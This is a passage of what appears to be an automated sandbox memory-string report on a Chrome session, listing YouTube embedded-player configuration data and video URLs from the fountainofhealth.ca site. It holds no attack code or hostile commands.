QyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},vm:function(){e=tb()},ie:function(){d()}}};var cc=wa(["data-gtm-yt-inspected-"]),GI=["www.youtube.com","www.youtube-nocookie.com"],HI,II=!1; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca/ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Oript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}AYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: RJhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: SKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323428029.000028EC04BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER
                                  Source: chrome.exe, 00000000.00000002.2496982560.000028EC04B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Science of THRIVE Approach3+https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Times New RomanE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Times New RomanE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323529169.000028EC04BB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\
                                  Source: chrome.exe, 00000000.00000002.2496056454.000028EC048D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Welcome to Thrive Learning3+https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370397956.000028EC03559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2